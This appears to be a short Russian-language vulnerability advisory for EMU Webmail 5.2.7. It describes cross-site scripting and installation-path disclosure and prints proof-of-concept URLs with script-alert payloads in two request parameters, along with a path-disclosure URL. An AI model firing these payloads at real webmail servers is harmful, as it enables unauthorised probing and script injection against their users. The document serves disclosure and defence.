Программа: EMU Webmail 5.2.7 

Несколько уязвимостей обнаружено в EMU Webmail. Удаленный пользователь может определить инсталляционный путь. Удаленный пользователь может выполнить XSS нападение. 

1. XSS: 

http://[target]:1010/webmail/emumail.fcgi?passed= parse&variable=%3Cscript%3Ealert(
%22G%22)%3C/ script%3E
http://[target]:1010/webmail/emumail.fcgi?passed= go_index&folder=<script>alert("G")</script>

Также не фильтруются поля имени пользователя и пароля в странице входа в систему. 

2. Раскрытие пути:

http://[target]:1010/webmail/init.emu

Оставить мнение